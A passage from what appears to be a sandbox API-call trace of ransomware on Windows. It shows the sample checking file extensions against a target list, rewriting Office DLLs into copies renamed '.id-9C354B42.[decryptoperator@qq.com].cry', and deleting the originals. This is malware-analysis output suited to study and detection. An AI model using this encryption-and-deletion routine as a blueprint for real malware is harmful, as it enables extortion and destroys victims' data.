Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.079] lstrlenW (lpString=".doc") returned 4 [0053.079] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0053.079] lstrlenW (lpString=".docx") returned 5 [0053.080] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0053.080] lstrlenW (lpString=".pdf") returned 4 [0053.080] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0053.080] lstrlenW (lpString=".xls") returned 4 [0053.080] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0053.080] lstrlenW (lpString=".xlsx") returned 5 [0053.080] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0053.080] lstrlenW (lpString=".ppt") returned 4 [0053.080] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0053.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.080] lstrlenW (lpString=".zip") returned 4 [0053.080] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0053.080] lstrlenW (lpString=".rar") returned 4 [0053.080] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0053.080] lstrlenW (lpString=".bz2") returned 4 [0053.080] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0053.080] lstrlenW (lpString=".7z") returned 3 [0053.080] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0053.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.080] lstrlenW (lpString=".dbf") returned 4 [0053.080] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0053.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.080] lstrlenW (lpString=".1cd") returned 4 [0053.080] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0053.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.080] lstrlenW (lpString=".jpg") returned 4 [0053.080] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0053.080] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.080] lstrlenW (lpString="ACEINTL.DLL") returned 11 [0053.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.081] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=198056) returned 1 [0053.081] CloseHandle (hObject=0x1c4) returned 1 [0053.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 0x20 [0053.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.081] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.081] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0053.082] GetLastError () returned 0x0 [0053.082] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x305a8, lpOverlapped=0x0) returned 1 [0053.215] WriteFile (in: hFile=0x228, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x305b0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x305b0, lpOverlapped=0x0) returned 1 [0053.220] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.220] WriteFile (in: hFile=0x228, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xea, lpOverlapped=0x0) returned 1 [0053.220] SetEndOfFile (hFile=0x228) returned 1 [0053.220] CloseHandle (hObject=0x228) returned 1 [0053.220] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.220] SetEndOfFile (hFile=0x1c4) returned 1 [0053.223] CloseHandle (hObject=0x1c4) returned 1 [0053.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.223] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 1 [0053.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.223] lstrlenW (lpString=".doc") returned 4 [0053.223] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.223] lstrlenW (lpString=".docx") returned 5 [0053.223] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.223] lstrlenW (lpString=".pdf") returned 4 [0053.224] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString=".xls") returned 4 [0053.224] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString=".xlsx") returned 5 [0053.224] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.224] lstrlenW (lpString=".ppt") returned 4 [0053.224] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.224] lstrlenW (lpString=".zip") returned 4 [0053.224] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString=".rar") returned 4 [0053.224] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString=".bz2") returned 4 [0053.224] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.224] lstrlenW (lpString=".7z") returned 3 [0053.224] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.224] lstrlenW (lpString=".dbf") returned 4 [0053.224] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.224] lstrlenW (lpString=".1cd") returned 4 [0053.224] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.224] lstrlenW (lpString=".jpg") returned 4 [0053.224] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.224] lstrlenW (lpString=".doc") returned 4 [0053.224] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString=".docx") returned 5 [0053.224] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.224] lstrlenW (lpString=".pdf") returned 4 [0053.224] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString=".xls") returned 4 [0053.224] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.224] lstrlenW (lpString=".xlsx") returned 5 [0053.224] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.224] lstrlenW (lpString=".ppt") returned 4 [0053.225] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.225] lstrlenW (lpString=".zip") returned 4 [0053.225] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.225] lstrlenW (lpString=".rar") returned 4 [0053.225] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.225] lstrlenW (lpString=".bz2") returned 4 [0053.225] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.225] lstrlenW (lpString=".7z") returned 3 [0053.225] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.225] lstrlenW (lpString=".dbf") returned 4 [0053.225] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.225] lstrlenW (lpString=".1cd") returned 4 [0053.225] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0053.225] lstrlenW (lpString=".jpg") returned 4 [0053.225] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.225] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.225] lstrlenW (lpString="MSOINTL.DLL") returned 11 [0053.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.226] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=2528128) returned 1 [0053.226] CloseHandle (hObject=0x1c4) returned 1 [0053.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll")) returned 0x20 [0053.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.226] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0053.227] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.227] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0053.227] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.227] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.243] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.243] ReadFile (in: hFile=0x1c4, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.260] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0053.260] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.261] ReadFile (in: hFile=0x1c4, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.281] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.282] WriteFile (in: hFile=0x1c4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0053.384] SetEndOfFile (hFile=0x1c4) returned 1 [0053.384] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0053.393] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0053.393] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.394] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0053.394] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.399] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0053.399] WriteFile (in: hFile=0x1c4, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0053.402] CloseHandle (hObject=0x1c4) returned 1 [0053.402] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.402] lstrlenW (lpString=".doc") returned 4 [0053.402] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.402] lstrlenW (lpString=".docx") returned 5 [0053.402] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.402] lstrlenW (lpString=".pdf") returned 4 [0053.402] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.402] lstrlenW (lpString=".xls") returned 4 [0053.402] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.402] lstrlenW (lpString=".xlsx") returned 5 [0053.402] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.402] lstrlenW (lpString=".ppt") returned 4 [0053.402] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.402] lstrlenW (lpString=".zip") returned 4 [0053.402] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.403] lstrlenW (lpString=".rar") returned 4 [0053.403] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.403] lstrlenW (lpString=".bz2") returned 4 [0053.403] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.403] lstrlenW (lpString=".7z") returned 3 [0053.403] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.403] lstrlenW (lpString=".dbf") returned 4 [0053.403] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.403] lstrlenW (lpString=".1cd") returned 4 [0053.403] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.403] lstrlenW (lpString=".jpg") returned 4 [0053.403] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.403] lstrlenW (lpString=".doc") returned 4 [0053.403] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.403] lstrlenW (lpString=".docx") returned 5 [0053.403] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.403] lstrlenW (lpString=".pdf") returned 4 [0053.403] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.403] lstrlenW (lpString=".xls") returned 4 [0053.403] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.403] lstrlenW (lpString=".xlsx") returned 5 [0053.403] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.403] lstrlenW (lpString=".ppt") returned 4 [0053.403] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.404] lstrlenW (lpString=".zip") returned 4 [0053.404] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.404] lstrlenW (lpString=".rar") returned 4 [0053.404] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.404] lstrlenW (lpString=".bz2") returned 4 [0053.404] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.404] lstrlenW (lpString=".7z") returned 3 [0053.404] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.404] lstrlenW (lpString=".dbf") returned 4 [0053.404] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.404] lstrlenW (lpString=".1cd") returned 4 [0053.404] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0053.404] lstrlenW (lpString=".jpg") returned 4 [0053.404] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.404] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.404] lstrlenW (lpString="OARPMANR.DLL") returned 12 [0053.404] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.405] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=11656) returned 1 [0053.405] CloseHandle (hObject=0x1c4) returned 1 [0053.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 0x20 [0053.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.405] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.405] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.405] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.405] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.406] GetLastError () returned 0x0 [0053.406] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x2d88, lpOverlapped=0x0) returned 1 [0053.465] WriteFile (in: hFile=0x21c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x2d90, lpOverlapped=0x0) returned 1 [0053.466] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.466] WriteFile (in: hFile=0x21c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.467] SetEndOfFile (hFile=0x21c) returned 1 [0053.467] CloseHandle (hObject=0x21c) returned 1 [0053.467] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.467] SetEndOfFile (hFile=0x1c4) returned 1 [0053.468] CloseHandle (hObject=0x1c4) returned 1 [0053.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.468] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 1 [0053.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.468] lstrlenW (lpString=".doc") returned 4 [0053.468] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.468] lstrlenW (lpString=".docx") returned 5 [0053.468] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.468] lstrlenW (lpString=".pdf") returned 4 [0053.468] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.468] lstrlenW (lpString=".xls") returned 4 [0053.468] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.468] lstrlenW (lpString=".xlsx") returned 5 [0053.468] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.468] lstrlenW 